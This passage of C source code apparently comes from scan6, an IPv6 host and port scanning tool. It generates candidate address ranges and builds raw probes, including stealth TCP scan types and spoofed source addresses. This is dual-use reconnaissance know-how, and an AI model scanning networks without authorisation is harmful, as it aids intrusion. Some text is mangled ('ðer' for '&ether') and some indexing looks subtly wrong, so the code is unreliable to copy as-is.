dst->start; (scan->target[scan->ntarget])->start.s6addr16[4]= htons(0); (scan->target[scan->ntarget])->start.s6addr16[5]= htons(0); (scan->target[scan->ntarget])->start.s6addr16[6]= htons(0); (scan->target[scan->ntarget])->start.s6addr16[7]= htons(service_ports_dec[i]); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end= dst->end; (scan->target[scan->ntarget])->end.s6addr16[4]= htons(0); (scan->target[scan->ntarget])->end.s6addr16[5]= htons(0); (scan->target[scan->ntarget])->end.s6addr16[6]= htons(EMBEDDED_PORT_2ND_WORD); (scan->target[scan->ntarget])->end.s6addr16[7]= htons(service_ports_dec[i]); scan->ntarget++; if(scan->ntarget >= scan->maxtarget){ return(0); } if( (scan->target[scan->ntarget] = malloc(sizeof(struct scan_entry))) == NULL) return(0); (scan->target[scan->ntarget])->start= dst->start; (scan->target[scan->ntarget])->start.s6addr16[4]= htons(0); (scan->target[scan->ntarget])->start.s6addr16[5]= htons(0); (scan->target[scan->ntarget])->start.s6addr16[6]= htons(service_ports_dec[i]); (scan->target[scan->ntarget])->start.s6addr16[7]= htons(0); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end= dst->end; (scan->target[scan->ntarget])->end.s6addr16[4]= htons(0); (scan->target[scan->ntarget])->end.s6addr16[5]= htons(0); (scan->target[scan->ntarget])->end.s6addr16[6]= htons(service_ports_dec[i]); (scan->target[scan->ntarget])->end.s6addr16[7]= htons(EMBEDDED_PORT_2ND_WORD); scan->ntarget++; } return(1); } /* * Function: load_lowbyte_entries() * * Generate scan_entry's for low-byte addresses */ int load_lowbyte_entries(struct scan_list *scan, struct scan_entry *dst){ unsigned int i; if(scan->ntarget >= scan->maxtarget){ return(0); } if( (scan->target[scan->ntarget] = malloc(sizeof(struct scan_entry))) == NULL) return(0); (scan->target[scan->ntarget])->start= dst->start; for(i=4; i<=7; i++) (scan->target[scan->ntarget])->start.s6addr16[i]= htons(0); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end= dst->end; for(i=4; i<=5; i++) (scan->target[scan->ntarget])->end.s6addr16[i]= htons(0); (scan->target[scan->ntarget])->end.s6addr16[6]= htons(LOW_BYTE_2ND_WORD_UPPER); (scan->target[scan->ntarget])->end.s6addr16[7]= htons(LOW_BYTE_1ST_WORD_UPPER); scan->ntarget++; return(1); } /* * Function: load_oui_entries() * * Generate scan_entry's based on a specific IEEE OUI */ int load_oui_entries(struct scan_list *scan, struct scan_entry *dst, struct ether_addr *oui){ unsigned int i; if(scan->ntarget >= scan->maxtarget) return(0); if( (scan->target[scan->ntarget]= malloc(sizeof(struct scan_entry))) == NULL){ if(verbose_f) puts("scans: malloc(): Not enough memory"); return(0); } generate_slaac_address(&(dst->start.in6_addr), oui, &((scan->target[scan->ntarget])->start.in6_addr)); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; for(i=0; i<4; i++) (scan->target[scan->ntarget])->end.s6addr16[i]= dst->end.s6addr16[i]; for(i=4; i<=7; i++) (scan->target[scan->ntarget])->end.s6addr16[i]= (scan->target[scan->ntarget])->start.s6addr16[i]; /* The three low-order bytes must vary from 0x000000 to 0xffffff */ (scan->target[scan->ntarget])->end.s6addr16[6]= (scan->target[scan->ntarget])->end.s6addr16[6] | htons(0x00ff); (scan->target[scan->ntarget])->end.s6addr16[7]= (scan->target[scan->ntarget])->end.s6addr16[7] | htons(0xffff); scan->ntarget++; return(1); } /* * Function: load_vm_entries() * * Generate scan_entry's based on virtualization prefixes, and scan modes */ int load_vm_entries(struct scan_list *scan, struct scan_entry *dst, struct prefix4_entry *v4host){ unsigned int i; uint32_t mask32; struct ether_addr ether; /* VirtualBOX */ if(vm_vbox_f){ if(scan->ntarget >= scan->maxtarget) return(0); if(ether_pton("08:00:27:00:00:00", ðer, sizeof(ether)) == 0){ if(verbose_f) puts("scan6: ether_pton(): Error converting Ethernet Address to presentation format"); return(0); } if( (scan->target[scan->ntarget]= malloc(sizeof(struct scan_entry))) == NULL){ if(verbose_f) puts("scans: malloc(): Not enough memory"); return(0); } generate_slaac_address(&(dst->start.in6_addr), ðer, &((scan->target[scan->ntarget])->start.in6_addr)); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end= dst->end; for(i=4; i<=7; i++) (scan->target[scan->ntarget])->end.s6addr16[i]= (scan->target[scan->ntarget])->start.s6addr16[i]; /* The three low-order bytes must vary from 0x000000 to 0xffffff */ (scan->target[scan->ntarget])->end.s6addr16[6]= (scan->target[scan->ntarget])->end.s6addr16[6] | htons(0x00ff); (scan->target[scan->ntarget])->end.s6addr16[7]= (scan->target[scan->ntarget])->end.s6addr16[7] | htons(0xffff); scan->ntarget++; } if(vm_vmware_f){ if(scan->ntarget >= scan->maxtarget) return(0); if(ether_pton("00:05:69:00:00:00", ðer, sizeof(ether)) == 0){ if(verbose_f) puts("scan6: ether_pton(): Error converting Ethernet Address to presentation format"); return(0); } if( (scan->target[scan->ntarget]= malloc(sizeof(struct scan_entry))) == NULL){ if(verbose_f) puts("scans: malloc(): Not enough memory"); return(0); } generate_slaac_address(&(dst->start.in6_addr), ðer, &((scan->target[scan->ntarget])->start.in6_addr)); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end= dst->end; for(i=4; i<=7; i++) (scan->target[scan->ntarget])->end.s6addr16[i]= (scan->target[scan->ntarget])->start.s6addr16[i]; /* If we know the host system IPv4 address, we can narrow down the search space. Otherwise the three low-order bytes must vary in the range 0x000000 to 0xffffff */ if(v4hostaddr_f){ if(v4hostprefix_f){ mask32= 0xffffffff; for(i=0; i< v4host->len; i++) mask32=mask32>>1; } else{ mask32= 0; } (scan->target[scan->ntarget])->start.s6addr16[6]= (scan->target[scan->ntarget])->start.s6addr16[6] | \ htons((ntohl(v4host->ip.s_addr) & 0x0000ff00)>>8); (scan->target[scan->ntarget])->start.s6addr16[7]= (scan->target[scan->ntarget])->start.s6addr16[7] | \ htons((ntohl(v4host->ip.s_addr) & 0x000000ff)<<8); (scan->target[scan->ntarget])->end.s6addr16[6]= (scan->target[scan->ntarget])->end.s6addr16[6] | \ htons((ntohl(v4host->ip.s_addr) & 0x0000ff00)>>8) | \ htonl((mask32 & 0x0000ff00)>>8); (scan->target[scan->ntarget])->end.s6addr16[7]= (scan->target[scan->ntarget])->end.s6addr16[7] | \ htons((ntohl(v4host->ip.s_addr) & 0x000000ff)<<8) | \ htonl((mask32 & 0x000000ff)<<8) | htons(0x00ff); } else{ (scan->target[scan->ntarget])->end.s6addr16[6]= (scan->target[scan->ntarget])->end.s6addr16[6] | htons(0x00ff); (scan->target[scan->ntarget])->end.s6addr16[7]= (scan->target[scan->ntarget])->end.s6addr16[7] | htons(0xffff); } scan->ntarget++; } if(vm_vmwarem_f){ if(scan->ntarget >= scan->maxtarget) return(0); if(ether_pton("00:50:56:00:00:00", ðer, sizeof(ether)) == 0){ if(verbose_f) puts("scan6: ether_pton(): Error converting Ethernet Address to presentation format"); return(0); } if( (scan->target[scan->ntarget]= malloc(sizeof(struct scan_entry))) == NULL){ if(verbose_f) puts("scans: malloc(): Not enough memory"); return(0); } generate_slaac_address(&(dst->start.in6_addr), ðer, &((scan->target[scan->ntarget])->start.in6_addr)); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end= dst->end; for(i=4; i<=7; i++) (scan->target[scan->ntarget])->end.s6addr16[i]= (scan->target[scan->ntarget])->start.s6addr16[i]; /* The three low-order bytes must vary from 0x000000 to 0x3fffff */ (scan->target[scan->ntarget])->end.s6addr16[6]= (scan->target[scan->ntarget])->end.s6addr16[6] | htons(0x003f); (scan->target[scan->ntarget])->end.s6addr16[7]= (scan->target[scan->ntarget])->end.s6addr16[6] | htons(0xffff); scan->ntarget++; } return(1); } /* * Function: load_vendor_entries() * * Lookup vendor's IEEE OUIs */ int load_vendor_entries(struct scan_list *scan, struct scan_entry *dst, char *vendor){ FILE *fp; struct ether_addr aux_oui, oui_list[MAX_IEEE_OUIS]; char oui_ascii[ETHER_ADDR_PLEN]; char *oui_end=":00:00:00"; char *oui_hex_string="(hex)"; char line[MAX_IEEE_OUIS_LINE_SIZE]; char *charptr; unsigned int lines=0, ouis; int i; ouis=0; if( (fp=fopen(fname, "r")) == NULL){ perror("scan6:"); return(0); } while( ouis <= MAX_IEEE_OUIS && fgets(line, MAX_IEEE_OUIS_LINE_SIZE, fp) != NULL){ /* We ship a minimalistic IEEE OUI "database" containing only the first "line" for each IEEE OUI. However, in order to handle the case of users employing the OUI database directly downloaded from the IEEE site, we perform a simple check to skip those lines that do not start with the pattern XX-XX-XX */ if( (lines=Strnlen(line, MAX_IEEE_OUIS_LINE_SIZE)) <= 9) continue; if(line[2] != '-' || line[5] != '-' || line[8] != ' ') continue; charptr= (char *)line + 9; /* Skip any whitespaces */ while(charptr < ( (char *)line + lines) && *charptr == ' ') charptr++; /* The database we ship contains the complete first line for each OUI, which includes the string "(hex)". If we find that string, we should skip it. */ if( (( (char *)line + lines) - charptr) >= OUI_HEX_STRING_SIZE){ /* If we find the "(hex)" string, we must skip it */ if( memcmp(oui_hex_string, charptr, OUI_HEX_STRING_SIZE) == 0) charptr+= OUI_HEX_STRING_SIZE; /* Now we mst skip any whitespaces between the "(hex)" string and the vendor name */ while(charptr < ( (char *)line + lines) && *charptr == ' ') charptr++; if(charptr >= ( (char *)line + lines)) continue; } if(match_strings(vendor, charptr)){ /* Copy the actual OUI to our array */ memcpy(oui_ascii, line, 8); /* Patch the dashes with colons (i.e., s/-/:/ */ oui_ascii[2]=':'; oui_ascii[5]=':'; /* zero-terminate the string */ oui_ascii[8]= 0; strncat(oui_ascii, oui_end, ETHER_ADDR_PLEN-Strnlen(oui_ascii, sizeof(oui_ascii))-1); if(ether_pton(oui_ascii, &oui_list[ouis], sizeof(oui_list[ouis])) == 0){ if(verbose_f) puts("scan6: ether_pton(): Error converting Ethernet Address to presentation format"); return(0); } ouis++; } } if(ferror(fp)){ if(verbose_f) perror("scan6:"); return(0); } fclose(fp); /* * If the target is a list of IEEE OUIs, we want to start trying from the newest OUIs, * to the older OUIs. The older OUIs are left for the end, since they have probably been * used for NICs used by legacy systems that are no longer online. Similarly, the very * newest OUI is left for the end, since it has probably not been used (yet) for any * commercialized Network Interface cards. */ if(sort_ouis_f && ouis >= 4){ aux_oui= oui_list[ouis-1]; for(i=ouis-2; i>=1; i--){ oui_list[i+1]= oui_list[i]; } oui_list[1] = aux_oui; } if(ouis == 0){ if(verbose_f) puts("scan6: Couldn't find any IEEE OUI for the target vendor"); return(0); } /* We walk the IEEE OUI list backwards: from newer to older OUIs */ for(i=ouis-1; i>=0; i--){ if(scan->ntarget >= scan->maxtarget) return(0); if( (scan->target[scan->ntarget]= malloc(sizeof(struct scan_entry))) == NULL){ if(verbose_f) puts("scans: malloc(): Not enough memory"); return(0); } generate_slaac_address(&(dst->start.in6_addr), &oui_list[i], &((scan->target[scan->ntarget])->start.in6_addr)); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; generate_slaac_address(&(dst->end.in6_addr), &oui_list[i], &((scan->target[scan->ntarget])->end.in6_addr)); /* The three low-order bytes must vary from 0x000000 to 0xffffff */ (scan->target[scan->ntarget])->end.s6addr16[6]= (scan->target[scan->ntarget])->end.s6addr16[6] | htons(0x00ff); (scan->target[scan->ntarget])->end.s6addr16[7]= (scan->target[scan->ntarget])->end.s6addr16[6] | htons(0xffff); scan->ntarget++; } return(1); } /* * Function: match_strings() * * Checks whether one string "matches" within another string */ int match_strings(char *buscar, char *buffer){ unsigned int buscars, buffers; unsigned int i=0, j=0; buscars= Strnlen(buscar, MAX_IEEE_OUIS_LINE_SIZE); buffers= Strnlen(buffer, MAX_IEEE_OUIS_LINE_SIZE); if(buscars > buffers) return(0); while(i <= (buffers - buscars)){ j=0; while(j < buscars){ if(toupper((int) ((unsigned char)buscar[j])) != toupper((int) ((unsigned char)buffer[i+j]))) break; j++; } if(j >= buscars) return(1); i++; } return(0); } /* * Function: load_bruteforce_entries() * * Converts a target prefix to scan_entry format */ int load_bruteforce_entries(struct scan_list *scan, struct scan_entry *dst){ if(scan->ntarget >= scan->maxtarget) return(0); if( (scan->target[scan->ntarget]= malloc(sizeof(struct scan_entry))) == NULL){ if(verbose_f) puts("scans: malloc(): Not enough memory"); return(0); } *scan->target[scan->ntarget]= *dst; scan->ntarget++; return(1); } /* * Function: load_smart_entries() * * Loads targets based on IID type */ int load_smart_entries(struct scan_list *scan, struct scan_list *smart){ struct decode6 decode; unsigned int i, j; for(i=0; i < smart->ntarget; i++){ decode.ip6= (smart->target[i])->start.in6_addr; decode_ipv6_address(&decode); if(scan->ntarget >= scan->maxtarget) return(FALSE); if( (scan->target[scan->ntarget]= malloc(sizeof(struct scan_entry))) == NULL){ if(verbose_f) puts("scans: malloc(): Not enough memory"); return(FALSE); } *(scan->target[scan->ntarget])= *(smart->target[i]); switch(decode.iidtype){ case IID_MACDERIVED: (scan->target[scan->ntarget])->start.s6addr32[3]= (scan->target[scan->ntarget])->start.s6addr32[3] & htonl(0xff000000); (scan->target[scan->ntarget])->end= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end.s6addr32[3]= (scan->target[scan->ntarget])->end.s6addr32[3] | htonl(0x00ffffff); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; scan->ntarget++; break; case IID_ISATAP: (scan->target[scan->ntarget])->start.s6addr32[3]= (scan->target[scan->ntarget])->start.s6addr32[3] & htonl(0xffff0000); (scan->target[scan->ntarget])->end= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end.s6addr32[3]= (scan->target[scan->ntarget])->end.s6addr32[3] | htonl(0x0000ffff); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; scan->ntarget++; break; case IID_LOWBYTE: case IID_EMBEDDEDPORT: case IID_EMBEDDEDPORTREV: case IID_UNSPECIFIED: case IID_RANDOM: /* Embedded-port addresses are rather unlikely, and usully a false-positive resulting from low-byte addresses. Hence we scan for low-byte addresses when "embedded port" addresses are detected. */ for(j=4; j<=7; j++) (scan->target[scan->ntarget])->start.s6addr16[j]= 0; (scan->target[scan->ntarget])->end= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end.s6addr16[6]= htons(LOW_BYTE_2ND_WORD_UPPER); (scan->target[scan->ntarget])->end.s6addr16[7]= htons(LOW_BYTE_1ST_WORD_UPPER); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; scan->ntarget++; break; case IID_EMBEDDEDIPV4: switch(decode.iidsubtype){ case IID_EMBEDDEDIPV4_32: (scan->target[scan->ntarget])->start.s6addr32[2]= htonl(0x00000000); (scan->target[scan->ntarget])->start.s6addr32[3]= (scan->target[scan->ntarget])->start.s6addr32[3] & htonl(0xffff0000); (scan->target[scan->ntarget])->end= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end.s6addr32[3]= (scan->target[scan->ntarget])->end.s6addr32[3] | htonl(0x0000ffff); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; scan->ntarget++; break; case IID_EMBEDDEDIPV4_64: (scan->target[scan->ntarget])->start.s6addr32[2]= (scan->target[scan->ntarget])->start.s6addr32[2] & htonl(0x00ff00ff); (scan->target[scan->ntarget])->start.s6addr32[3]= htonl(0x00000000); (scan->target[scan->ntarget])->end= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end.s6addr32[3]= (scan->target[scan->ntarget])->end.s6addr32[3] | htonl(0x00ff00ff); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; scan->ntarget++; break; } break; case IID_PATTERN_BYTES: (scan->target[scan->ntarget])->end= (scan->target[scan->ntarget])->start; for(j=8; j<=16; j++) (scan->target[scan->ntarget])->end.s6addr[j]= ((scan->target[scan->ntarget])->start.s6addr[j])?0xff:0x00; for(j=8; j<=16; j++) (scan->target[scan->ntarget])->start.s6addr[j]= 0x00; (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; scan->ntarget++; break; case IID_TEREDO_RFC5991: case IID_TEREDO_RFC4380: case IID_TEREDO_UNKNOWN: for(j=8; j<=11; j++) (scan->target[scan->ntarget])->start.s6addr[j]= 0x00; (scan->target[scan->ntarget])->end= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->start.s6addr[8]= 0xbc; for(j=9; j<=11; j++) (scan->target[scan->ntarget])->start.s6addr[8]= 0xff; (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; scan->ntarget++; break; default: /* By default we scan for low-byte-addresses (same code as above) */ for(j=8; j<=16; j++) (scan->target[scan->ntarget])->start.s6addr[j]= 0x00; for(j=8; j<=16; j++) (scan->target[scan->ntarget])->end.s6addr[j]= 0xff; (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; scan->ntarget++; break; } } return(TRUE); } /* * Function: prefix_to_scan() * * Converts a target prefix to scan_entry format */ void prefix_to_scan(struct prefix_entry *pref, struct scan_entry *scan){ uint32_t mask; uint8_t words; unsigned int i; scan->start.in6_addr= pref->ip6; scan->cur.in6_addr= pref->ip6; words= pref->len/32; for(i=0; i< words; i++) (scan->end).in6_addr.s6_addr32[i]= (pref->ip6).s6_addr32[i]; for(i= (words+1); i<4; i++){ (scan->end).in6_addr.s6_addr32[i]= htonl(0xffffffff); } mask=0xffffffff; for(i=0; i< (pref->len % 32); i++) mask= mask>>1; if(pref->len % 32) (scan->end).in6_addr.s6_addr32[words]= (scan->start).in6_addr.s6_addr32[words] | htonl(mask); } /* * Function: usage() * * Prints the syntax of the scan6 tool */ void usage(void){ puts("usage: scan6 (-L | -d) [-i INTERFACE] [-s SRC_ADDR[/LEN] | -f] \n" " [-S LINK_SRC_ADDR | -F] [-p PROBE_TYPE] [-Z PAYLOAD_SIZE] [-o SRC_PORT]\n" " [-a DST_PORT] [-X TCP_FLAGS] [-P ADDRESS_TYPE] [-q] [-e] [-t]\n" " [-x RETRANS] [-o TIMEOUT] [-V VM_TYPE] [-b] [-B ENCODING] [-g]\n" " [-k IEEE_OUI] [-K VENDOR] [-m PREFIXES_FILE] [-w IIDS_FILE] [-W IID]\n" " [-Q IPV4_PREFIX[/LEN]] [-T] [-I INC_SIZE] [-r RATE(bps|pps)] [-l]\n" " [-z SECONDS] [-c CONFIG_FILE] [-v] [-h]"); } /* * Function: print_help() * * Prints help information for the scan6 tool */ void print_help(void){ puts(SI6_TOOLKIT); puts( "scan6: An advanced IPv6 scanning tool\n"); usage(); puts("\nOPTIONS:\n" " --interface, -i Network interface\n" " --src-address, -s IPv6 Source Address\n" " --dst-address, -d IPv6 Destination Range or Prefix\n" " --prefixes-file, -m Prefixes file\n" " --link-src-address, -S Link-layer Destination Address\n" " --probe-type, -p Probe type for host scanning {echo, unrec, all}\n" " --port-scan, -j Port scan type and range {tcp,udp}:port_low[-port_hi]\n" " --tcp-scan-type, -G TCP port-scanning type {syn,fin,null,xmas,ack}\n" " --payload-size, -Z TCP/UDP Payload Size\n" " --src-port, -o TCP/UDP Source Port\n" " --dst-port, -a TCP/UDP Destination Port\n" " --tcp-flags, -X TCP Flags\n" " --print-type, -P Print address type {local, global, all}\n" " --print-unique, -q Print only one IPv6 addresses per Ethernet address\n" " --print-link-addr, -e Print link-layer addresses\n" " --print-timestamp, -t Print timestamp for each alive node\n" " --retrans, -x Number of retransmissions of each probe\n" " --timeout, -O Timeout in seconds (default: 1 second)\n" " --local-scan, -L Scan the local subnet\n" " --rand-src-addr, -f Randomize the IPv6 Source Address\n" " --rand-link-src-addr, -F Randomize the Ethernet Source Address\n" " --tgt-virtual-machines, -V Target virtual machines\n" " --tgt-low-byte, -b Target low-byte addresses\n" " --tgt-ipv4, -B Target embedded-IPv4 addresses\n" " --tgt-port, -g Target embedded-port addresses\n" " --tgt-ieee-oui, -k Target IPv6 addresses embedding IEEE OUI\n" " --tgt-vendor, -K Target IPv6 addresses for vendor's IEEE OUIs\n" " --tgt-iids-file, -w Target Interface IDs (IIDs) in specified file\n" " --tgt-iid, -W Target Interface IDs (IIDs)\n" " --ipv4-host, -Q Host IPv4 Address/Prefix\n" " --sort-ouis, -T Sort IEEE OUIs\n" " --inc-size, -I Increments size\n" " --rate-limit, -r Rate limit the address scan to specified rate\n" " --loop, -l Send periodic probes to the specified targets\n" " --sleep, -z Pause between periodic probes\n" " --config-file, -c Use alternate configuration file\n" " --help, -h Print help for the scan6 tool\n" " --verbose, -v Be verbose\n" "\n" " Programmed by Fernando Gont for SI6 Networks \n" " Please send any bug reports to \n" ); } /* * Function: send_probe_remote() * * Sends a probe packet to a remote target */ int send_probe_remote(struct iface_data *idata, struct scan_list *scan, struct in6_addr *srcaddr, unsigned char type){ unsigned char *ptr; unsigned int i; struct ether_header *ether; struct dlt_null *dlt_null; #if defined(__linux__) struct sll_linux *sll_linux; #endif unsigned char *v6buffer; struct ip6_hdr *ipv6; struct tcp_hdr *tcp; struct ip6_dest *destopth; struct ip6_option *opt; uint32_t *uint32; ether = (struct ether_header *) buffer; dlt_null= (struct dlt_null *) buffer; #if defined(__linux__) sll_linux= (struct sll_linux *) buffer; #endif v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; if(idata->type == DLT_EN10MB){ ether->ether_type = htons(ETHERTYPE_IPV6); if(!(idata->flags & IFACE_LOOPBACK)){ ether->src = idata->ether; if(!onlink_f){ ether->dst = idata->nhhaddr; }else{ if(ipv6_to_ether(idata->pfd, idata, &(scan->target[scan->ctarget])->cur.in6_addr, &(idata->hdstaddr)) != 1){ return(1); } } } } else if(idata->type == DLT_NULL){ dlt_null->family= PF_INET6; } #if defined (__OpenBSD__) else if(idata->type == DLT_LOOP){ dlt_null->family= htonl(PF_INET6); } #elif defined(__linux__) else if(idata->type == DLT_LINUX_SLL){ sll_linux->sll_pkttype= htons(0x0004); sll_linux->sll_hatype= htons(0xffff); sll_linux->sll_halen= htons(0x0000); sll_linux->sll_protocol= htons(ETHERTYPE_IPV6); } #endif ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= 255; ipv6->ip6_src= idata->srcaddr_f?(*srcaddr):*sel_src_addr_ra(idata, &((scan->target[scan->ctarget])->cur.in6_addr)); ipv6->ip6_dst= (scan->target[scan->ctarget])->cur.in6_addr; #ifdef DEBUG print_ipv6_address("Direccion actual:", &((scan->target[scan->ctarget])->cur.in6_addr)); #endif prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; switch(type){ case PROBE_ICMP6_ECHO: *prev_nh = IPPROTO_ICMPV6; if( (ptr+sizeof(struct icmp6_hdr)+ICMPV6_ECHO_PAYLOAD_SIZE) > (v6buffer+idata->mtu)){ if(idata->verbose_f>1) puts("Packet too large while creating ICMPv6 Echo Request Probe packet"); return(-1); } icmp6 = (struct icmp6_hdr *) ptr; icmp6->icmp6_type = ICMP6_ECHO_REQUEST; icmp6->icmp6_code = 0; icmp6->icmp6_data16[0]= htons(getpid()); /* Identifier */ icmp6->icmp6_data16[1]= htons(0); /* Sequence Number */ ptr = ptr+ sizeof(struct icmp6_hdr); for(i=0; i<(ICMPV6_ECHO_PAYLOAD_SIZE>>2); i++){ *(uint32_t *)ptr = random(); ptr += sizeof(uint32_t); } ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); icmp6->icmp6_cksum = 0; icmp6->icmp6_cksum = in_chksum(v6buffer, icmp6, ptr-((unsigned char *)icmp6), IPPROTO_ICMPV6); break; case PROBE_UNREC_OPT: *prev_nh = IPPROTO_DSTOPTS; if( (ptr+sizeof(struct icmp6_hdr) + 8 + ICMPV6_ECHO_PAYLOAD_SIZE) > (v6buffer+idata->mtu)){ if(idata->verbose_f>1) puts("Packet too large while creating Unrec. Opt. Probe Packet"); return(-1); } destopth = (struct ip6_dest *) ptr; destopth->ip6d_len= 0; destopth->ip6d_nxt= IPPROTO_ICMPV6; ptr= ptr + 2; opt= (struct ip6_option *) ptr; opt->ip6o_type= 0x80; opt->ip6o_len= 4; ptr= ptr + 2; uint32 = (uint32_t *) ptr; *uint32 = random(); ptr= ptr +4; icmp6 = (struct icmp6_hdr *) ptr; icmp6->icmp6_type = ICMP6_ECHO_REQUEST; icmp6->icmp6_code = 0; icmp6->icmp6_data16[0]= htons(getpid()); /* Identifier */ icmp6->icmp6_data16[1]= htons(0); /* Sequence Number */ ptr = ptr+ sizeof(struct icmp6_hdr); for(i=0; i<(ICMPV6_ECHO_PAYLOAD_SIZE>>2); i++){ *(uint32_t *)ptr = random(); ptr += sizeof(uint32_t); } ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); icmp6->icmp6_cksum = 0; icmp6->icmp6_cksum = in_chksum(v6buffer, icmp6, ptr-((unsigned char *)icmp6), IPPROTO_ICMPV6); break; case PROBE_TCP: *prev_nh = IPPROTO_TCP; if( (ptr+sizeof(struct tcp_hdr)) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet Too Large while inserting TCP header"); return(0); } tcp = (struct tcp_hdr *) ptr; memset(tcp, 0, sizeof(struct tcp_hdr)); if(srcport_f) tcp->th_sport= htons(srcport); else tcp->th_sport= htons(1024+ rand() % 64512); if(dstport_f) tcp->th_dport= htons(dstport); else tcp->th_dport= htons(1+ rand() % 1024); if(tcpflags_f) tcp->th_flags= tcpflags; else tcp->th_flags= TH_ACK; if(tcpflags & TH_ACK) tcp->th_ack= htonl(rand()); else tcp->th_ack= htonl(0); tcp->th_win= htons( 4096 * (rand() % 9 + 1)); /* Current version of tcp6 does not support sending TCP options */ tcp->th_off= sizeof(struct tcp_hdr) >> 2; ptr+= tcp->th_off << 2; if( (ptr + rhbytes) > v6buffer+idata->max_packet_size){ puts("Packet Too Large while inserting TCP segment"); exit(EXIT_FAILURE); } while(rhbytes>=4){ *(uint32_t *)ptr = random(); ptr += sizeof(uint32_t); rhbytes -= sizeof(uint32_t); } while(rhbytes>0){ *(uint8_t *) ptr= (uint8_t) random(); ptr++; rhbytes--; } ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); tcp->th_sum = 0; tcp->th_sum = in_chksum(v6buffer, tcp, ptr-((unsigned char *)tcp), IPPROTO_TCP); break; } #ifdef DEBUG puts("In send_probe_remote(), prior to send"); #endif if((nw=pcap_inject(idata->pfd, buffer, ptr - buffer)) == -1){ if(idata->verbose_f) printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); return(0); } #ifdef DEBUG puts("In send_probe_remote(), after to send"); #endif if(nw != (ptr-buffer)){ if(idata->verbose_f) printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, \ (LUI) (ptr-buffer)); return(0); } return(1); } /* * Function: send_pscan_probe() * * Sends a probe packet to a target port */ int send_pscan_probe(struct iface_data *idata, struct port_list *port_list, struct in6_addr *srcaddr, unsigned char type){ unsigned char *ptr; struct ether_header *ether; struct dlt_null *dlt_null; #if defined(__linux__) struct sll_linux *sll_linux; #endif unsigned char *v6buffer; struct ip6_hdr *ipv6; struct tcp_hdr *tcp; struct udp_hdr *udp; unsigned int rhleft; ether = (struct ether_header *) buffer; dlt_null= (struct dlt_null *) buffer; #if defined(__linux__) sll_linux= (struct sll_linux *) buffer; #endif v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; if(idata->type == DLT_EN10MB){ ether->ether_type = htons(ETHERTYPE_IPV6); if(!(idata->flags & IFACE_LOOPBACK)){ ether->src = idata->ether; if(!onlink_f){ ether->dst = idata->nhhaddr; }else{ if(ipv6_to_ether(idata->pfd, idata, &(idata->dstaddr), &(idata->hdstaddr)) != 1){ return(1); } } } } else if(idata->type == DLT_NULL){ dlt_null->family= PF_INET6; } #if defined (__OpenBSD__) else if(idata->type == DLT_LOOP){ dlt_null->family= htonl(PF_INET6); } #elif defined(__linux__) else if(idata->type == DLT_LINUX_SLL){ sll_linux->sll_pkttype= htons(0x0004); sll_linux->sll_hatype= htons(0xffff); sll_linux->sll_halen= htons(0x0000); sll_linux->sll_protocol= htons(ETHERTYPE_IPV6); } #endif ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= 255; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; switch(type){ case IPPROTO_TCP: *prev_nh = IPPROTO_TCP; if( (ptr+sizeof(struct tcp_hdr)) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet Too Large while inserting TCP header"); return(0); } tcp = (struct tcp_hdr *) ptr; memset(tcp, 0, sizeof(struct tcp_hdr)); if(srcport_f) tcp->th_sport= htons(srcport); else tcp->th_sport= htons(1024+ rand() % 64512); tcp->th_dport= htons((port_list->port[port_list->cport])->cur); if(tcpflags_f) tcp->th_flags= tcpflags; else tcp->th_flags= TH_ACK; if(tcpflags & TH_ACK) tcp->th_ack= htonl(rand()); else tcp->th_ack= htonl(0); tcp->th_win= htons( 4096 * (rand() % 9 + 1)); /* Current version of tcp6 does not support sending TCP options */ tcp->th_off= sizeof(struct tcp_hdr) >> 2; ptr+= tcp->th_off << 2; if( (ptr + rhbytes) > v6buffer+idata->max_packet_size){ puts("Packet Too Large while inserting TCP segment"); exit(EXIT_FAILURE); } while(rhbytes>=4){ *(uint32_t *)ptr = random(); ptr += 